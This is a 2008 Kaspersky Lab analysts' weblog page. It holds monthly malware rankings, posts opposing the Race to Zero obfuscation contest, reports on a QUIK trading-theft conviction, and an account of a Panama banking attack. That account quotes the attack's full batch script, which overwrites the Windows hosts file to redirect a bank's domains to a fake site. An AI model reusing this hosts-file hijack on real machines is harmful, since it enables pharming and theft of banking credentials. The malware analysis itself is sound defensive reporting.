Subscriptions | RSS Feeds | Discussions | Polls | Site Map




All Threats

Viruses

Hackers

Spam
Whole site    Viruses
  
Virus Encyclopedia
Riskware
Alerts
Analysis
News
Glossary
Weblog

 
Archive

<< 2008  
Jan Feb Mar
Apr May  
     
     
About Diary's Authors
About Diary's Authors

The Analyst's Diary is a weblog maintained by virus analysts from Kaspersky Lab headed by Eugene Kaspersky. Find out more about the authors of this weblog.
Viruslist poll
How would you prefer to pay for your antivirus solution?
Using a prepay card
Via your mobile (SMS)
Via the Internet using a debit\ credit card
Using cash\ credit\ debit in a shop
Using an e-payment system (e.g. PayPal)
Other
  View responses
 

  Home / Weblog

Analyst's Diary

Malware Miscellany, April 2008


  Yury       May 07, 2008 | 13:02  GMT

comment  


  1. Greediest Trojan targeting banks

    Trojan-Spy.Win32.Banker.lax, which targets customers of 104 banks, wins this category in April

  2. Greediest Trojan targeting payment systems

    Another variant of Banker, in this case Trojan-Spy.Win32.Banker.krv takes the palm this month. It targets the users of three e-payment systems.

  3. Greediest malicious program targeting payment cards

    April's winner in this category is Trojan-Spy.Win32.Bancos.blc, which has its sights set on three payment card systems at once.

  4. Stealthiest malicious program

    This month, one variant of Backdoor.Win32.Hupigon.bqsi wins out, being packed with seven different packers.

  5. Smallest malicious program

    The tiny Trojan.BAT.MouseDisable.b, with a mere 22 bytes, still manages once launched to block the mouse.

  6. Largest malicious program

    April's winner is Trojan-Dropper.Win32.Agent.nrh – at 46MB in size, it's not that large compared to previous victors in this category

  7. Most malicious program

    There's a new entrant in this category – a modification of Backdoor.Win32.Agobot.gen replaces the Haradong family which has ruled for the last two months. Malicious programs from this family search for and destroy antivirus solutions in all possible locations – in RAM, the system registry and on disk.

  8. Most common malicious program in email traffic

    In a couple of months we may have to reconsider the value of this category, as it's been almost exclusively occupied by Email-Worm.Win32.Netsky.q. The worm isn't conceding ground to any other malicious program, and during the last month it's even increased its share of infected mail traffic to 40.58%.

  9. Most common Trojan family

    Backdoor.Win32.Hupigon remains the most 'fertile' malicious program, giving birth to 3151 modifications in the course of a single month – only slightly fewer than last month.

  10. Most common virus/ worm family

    Worm.Win32.AutoRun heads this category in April, with 230 new modifications.



More thoughts on drawing the line


  VitalyK       April 30, 2008 | 16:17  GMT

comments (2)  
Following on from Eugene's post, I'd like to chip in with my thoughts on what's happening at Defcon this year. I spoke at Defcon last year, and I'd say that the event is something unique – an opportunity for smart people with unconventional minds to meet and share their knowledge. Defcon not only gives you access to new ideas, but you also get to encounter the spirit of modern cyberculture.

It seems to me that the emergence of contests like Race to Zero was always simply a matter of time. And now that such a contest has appeared we'll see similar ones in the future, whether we like it or not. Of course breaking the law is wrong - I think the exact form of the contest will be modified before Defcon starts in order to meet legal restrictions.

However, I think the Race to Zero contest organizers could change the rules of the game in other ways, to make it beneficial to all participants. Let me explain...

Let's take a look at what the participants are going to manipulate: they will have the code of existing applications and probably some prepared sets of nop code. Nop code ("no operation" code) is special software code that neither affects the state of the machine nor alters the system. There are many approaches to obfuscation techniques but almost all of them have the same basic principle: the affected code is restructured and mixed with nop code. Depending on the algorithm used to mix the two sets of code, either it will be more difficult to read/re-engineer the code or the code will be able to evade detection by signature-based AV software engines.

Of course, obfuscated code can cause headaches for AV companies. Because obfuscated code is slightly harder to analyse manually, it takes more resources to maintain a collection of obfuscated samples which do not differ from each other in terms of behaviour. If an obfuscated sample is analysed using automated tools, the analysis will take longer than that of a non-obfuscated sample. Given this, AV companies work pretty hard on deobfuscation tools.

There are two issues here: obfuscation and deobfuscation, which differ a bit in terms of complexity. Imagine you have a bucket of sugar and a bucket of sand. You can mix the contents of the two buckets together in different ways – and these different ways of mixing are like different obfuscation algorithms. The reverse is deobfuscation – separating the mixture of sugar and sand into its two component parts. Just take a minute to think about those two buckets – it's so quick and easy to mix the contents, but separating them is a long, tiring process!

In some sense, dealing with obfuscation algorithms and solving problems like making an application undetectable by AV software is easy – it's a white box issue. You have the source data as well as the AV software, and the chance to analyse the disassembled code, so you can develop and debug your own application to alter the data. You can see each part of the process and the mechanism you create.

Deobfuscation, though, is completely different. You have a few pieces of code that have been transformed by obfuscation – and you don't have the application used to obfuscate the code. So deobfuscation doesn't even fit the black box model, where you usually have the opportunity to utilize a mechanism as many times as you like, although you can't see inside it in order to understand how it works. When you deal with deobfuscation you have only data that results from this mechanism; the data has to be studied in order to determine unique/ common features, and then you have to draw your own conclusion on how the hypothetical black box actually works.

In my opinion, deobfuscation requires greater imagination and skills than obfuscation. I think if the organizers of Race to Zero keep the principles of ethical hacking firmly in mind, and extend the rules of the contest to include deobfuscation it could be good fun, and a good experience for everyone involved.

Just to be very clear: examining the issues of obfuscation/ deobfuscation doesn't mean you have to create new malware or modify existing malware. It's simply not necessary. The contest isn't just a technical challenge, but a moral one as well. Let's hope that everyone makes the decision to be on the right side of the line so we can all reap the benefits.

Drawing the line


  Eugene       April 28, 2008 | 21:09  GMT

comments (6)  
The so-called 'malware obfuscation contest' proposed by the folks at Race to Zero is already generating contradictory discussions.

IMHO - either something is ethical or not...and I firmly hold that creating new malware to bypass security products 'for fun' is not!

We anti-virus researchers have always opposed the creation of new malware under any circumstances. The only excuse for creating malware in test environments that ever sounded vaguely reasonable was the old "we need to create new samples in order to study attack methods in detail".

Let's get real folks - we are seeing new samples by the thousands today - we have more than enough 'live' malware to study in order to improve our technologies. So even if this excuse was "sort-of-maybe one-time-only almost-acceptable" once upon a time, it is NOT acceptable in 2008.

The assertion that "signature-based antivirus is dead, people need to look to heuristic, statistical and behavior based techniques to identify emerging threats" is just a cheap publicity stunt. Nobody, but nobody in the AV industry depends only on signatures - we haven't for years. In fact, it sounds as if most (read all) AV scanners will fail the 'tests' in the 'contest' because it's easy to cheat signature-based scanners and static heuristics.

This will send a clear message to thousands of e-criminals: "do more obfuscation". So, this 'contest' will only stimulate e-criminals to research and develop new obfuscation technologies. Since they are busy doing this anyway - they just will do it more and more. Thanks, but no thanks, virus labs don't need such stimulation - we have enough work as it is.

The most positive public responses are calling the contest a form of product testing. Wrong!!

Antivirus testing, like any other product testing, must be done by trained professionals, for instance Andreas Clementi, Andreas Marx or Virus Bulletin, in a fair, ethical and scientific manner. This is how things work in a reputable industry.

The Race to Zero/DefCon 'contest' is:

  • NOT done by professional testers - no comment

  • NOT fair - no public contacts with AV vendors to date

  • NOT scientific - the test bed is not delineated

  • And, last, but not least, it is 100% NOT ethical! Writing malware is a crime. End of story.

Finally - what about the US Federal Computer Act?? And other legislation? Is this 'contest' even legal in the US? Is the agency responsible for monitoring e-crime aware of it?

So, it all boils down to... should we have public and unstructured 'contests to test' criminal technologies run by uncertified/unproven people? What about a 'live robbing a bank contest' to test bank security systems? Or maybe a 'drugs distribution trial in a school' - to test the narcotics police?

Anything can be taken to a ridiculous extreme - code analysis included. Let's all take a deep breath and focus on developing protection technologies, not 'modifying malcode for fun'.

Panama – a tempting target


  Dmitry       April 21, 2008 | 12:37  GMT

comments (1)  

We recently got back from Panama, where we took part in a conference on cyber crime in Latin America.

Although Costa Rica is the country with the highest Internet penetration rate, Panama leads the rankings with the highest number of successful attacks. And what makes Panama such a tempting target? The flourishing economy and a free trade zone have led to a huge number of banks making their home in the country – and the successful attacks are attacks on banks.

Our conference presentation highlighted that today attacks are often highly local: they're tailored to a specific country, target a specific group within that country, and, as a rule, they generally don't spread beyond the bounds of the region or even the state. This is a tactic designed to extend the life cycle of the malicious programs used to conduct the attack - localized attacks minimize the risk of being detected by antivirus companies.

Pretty much as soon as we got back from Panama one of these attacks broke out. Email users in the .pa domain were spammed with an email inviting them to pick up an e-card from the Latin American service Gusanito.com. When the user clicks the link, a file called 001002003.exe downloads to the victim machine and then conducts the following operation:

@echo off

title AVERSINODETECTA----------HAHAHAHAHAHAHAHAHAHAHA

del c:\WINDOWS\system32\drivers\etc\hosts

copy hosts c:\WINDOWS\system32\drivers\etc\hosts

echo 75.127.*.* www.bbvapanama.com >>%windir%\System32\drivers\etc\hosts

echo 75.127.*.* bbvapanama.com >>%windir%\System32\drivers\etc\hosts

echo 75.127.*.* www.bbvanetpanama.com >>%windir%\System32\drivers\etc\hosts

echo 75.127.*.* bbvanetpanama.com >>%windir%\System32\drivers\etc\hosts

exit

echo > "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpfile0.tmp"

The malicious program adds an IP record for the BBV Panama domain to the local DNS file. The 'title' field, which includes a phrase meaning 'They might not notice', indicates that the author is almost certainly Spanish speaking.

If the victim of the attack is a client of the bank and tries to visit the bank's site, s/he will be automatically redirected to a fake site which is, as usual, an exact copy of the original site.

As I mentioned above, malicious users try and spread their creations within a limited area in order to evade detection by antivirus solutions for as long as possible. This case shows that the tactic does work, to some extent – three days after the attack, only 2 antivirus companies were detecting the malicious program. One of them was Kaspersky Anti-Virus, which detects the culprit behind this latest attack as Trojan.Win32.Qhost.alc.


QUIK conviction


  Aleks       April 18, 2008 | 15:49  GMT

comment  
There's been an update on the Trojan case we mentioned earlier this week – a 24 year old has been sentenced to five and a half years for computer crime. He was found guilty under Section 1, Article 272 (unlawful access to legally protected computer data) and Section 4, Article 159 (gross fraud) of the Russian Federal Criminal Code and will serve out his sentence in a minimum-security correctional facility.

The case stated that "between June and August 2007, the accused used a malicious program to get the secret key of a commercial organization and, in the name of the organization, traded futures on the commercial market." The losses totalled more than 1.3 million roubles.

The young man, who admitted his guilt in court, transferred 1,000,000 of his ill-gotten roubles to a personal account which he opened with one of the local Yoshkar-Ola banks.

Turning a QUIK buck


  Aleks       April 16, 2008 | 14:33  GMT

comments (1)  

Regular readers of this blog and our analytical articles may remember that in summer last year we wrote about a new variant of Bancos.aam designed to steal data from users of QUIK, a Russian Internet trading system.

Russian reports on the ongoing investigation say the suspect, one Evgeny Simonov from Yoshkar-Ola, is currently not permitted to leave the city. He used the Trojan to steal a broker's log-in and password and then illegally made at least 2.5 million roubles (around a hundred thousand dollars) on fraudulent trades.

Simonov clearly saw the opportunity to turn a quick buck. But he slipped by making deals via his mobile: the investigators checked when the fraudulent deals were made, and the originating IP address, and traced Simonov via his mobile operator.

The whole case throws up an interesting point: new technologies and increased connectivity provide malware writers with increased opportunities, but the same technologies can also be used against them.

It's all in the number


  Eugene       April 14, 2008 | 17:11  GMT

comments (1)  
Ah, numbers: there are simple numbers, magic numbers, lucky numbers and unlucky numbers. There are people who are scared of numbers, people who don't understand numbers, people who love numbers, and people who ignore numbers. Me...I love numbers and always pay attention to how they sound and taste.

Yesterday some of us got on a flight to Boston from NYC. As the computer produced my boarding pass, I watched the numbers unfold and saw that this was a special day: number 13 was the name of the game.

13 - the date
13 - the flight number - with the 2 and 0 voided by the 20 in the gate number
13 - the boarding time

AND

3 + A in hexadecimal is 3 + 10 =13

Four 13s on one boarding pass!! Wow - I'm amazed I survived! How did I do it, you might ask if you happen to believe in the bad luck 13 brings?

I don't know: maybe it was because the flight departed at 200P or APR 2008 =14 if you add the digits in that line. And finally, it was my 14th flight of the year, not the 13th.

So, I survived and I'm completing this US tour with a day in Boston. Flight number 15 of the year will be tomorrow and I'll be looking at new numbers.

Infected devices


  Michael       April 10, 2008 | 20:01  GMT

comment  
It seems as if we can't turn around anymore without hearing about infected devices of all sorts. This week we've already seen HP admitting to shipping infected floppy/flash drives - see SANS Internet Storm Center for details.

In the meantime, one of my co-workers went on vacation and treated herself to an MP3 player.

She got home and plugged her new toy into a USB port in her PC and yes, you guessed - it was infected. Fortunately she had KIS installed:

On the one hand, we all enjoy using our smartphones, MP3 players, flash drives and so on. On the other hand, we can't ever be sure that our devices are clean. So protect those servers and laptops folks...cause portable devices aren't going away anytime soon. Nor are they secure.

Malware Miscellany, March 2008


  Yury       April 10, 2008 | 13:22  GMT

comments (2)  

  1. Greediest malicious program targeting banks

    As we move into spring, this category is taken by one modification of Trojan-Spy.Win32.Banker.zq, which targets 109 banks simultaneously – a huge rise on last month's Banker.cji, which targeted 44 banks.


  2. Greediest malicious program targeting payment systems

    March's winner in this category is Trojan-Spy.Win32.Banker.etk, which has its sights set on a comparatively modest three payment systems.


  3. Greediest malicious program targeting payment cards

    Another member of the Banker family, Trojan-Spy.Win32.Banker.enw takes the crown this month, targeting the users of four different payment systems at once.


  4. Stealthiest malicious program

    If you're a regular reader of this column, you'll know that malware packed with ten different packers is nothing rare. And this month gives us yet another example: Trojan-Downloader.Win32.Delf.ain.


  5. Smallest malicious program

    Get your magnifying glasses out for this month's winner – Trojan.BAT.FormatC.r which weighs in at a mere 16 bytes, but still to wipe your C: disk

  6. Biggest malicious program

    For the second month in a row this category is taken by a member of the Haradong family; in this case it's Trojan.Win32.Haradong.fj, which weighs in at 305MB, 79MB larger than last month's entrant.

  7. Most malicious program

    With the transition to spring, the leader in this category has changed. March's winner is Backdoor.Win32.Rbot.gen, and given the nasty nature of the Rbot family, this comes as no surprise. The programs covered by this detection use a number of methods to disable a range of antivirus solutions.

  8. Most common malicious program in email traffic

    No changes here this month – once again we've got Email-Worm.Win32.Netsky.q leading, making up 37.39% of all infected mail traffic, slightly up on last month's 36%.

  9. Most common Trojan family

    March's winner is Backdoor.Win32.Hupigon – we detected a stunning 3381 modifications of this family in March!


  10. Most common virus/ worm family

    This category has something slightly new for March: Net-Worm.Win32.Kolab dominates this particular category with 35 modifications.



Malware Defence Workshop details


  David       April 10, 2008 | 08:41  GMT

comments (3)  

Following on from last Wednesday's post - if you're interested in attending our Malware Defence Workshop (which includes puzzles like the one shown above!), do contact us on malwaredefence [at] kasperskylab.co.uk and we'll send you a schedule.

Page Top  |  Archive >>

 

Copyright © 1996 - 2008
Kaspersky Lab
Industry-leading Antivirus Software
All rights reserved
 

Email: webmaster@viruslist.com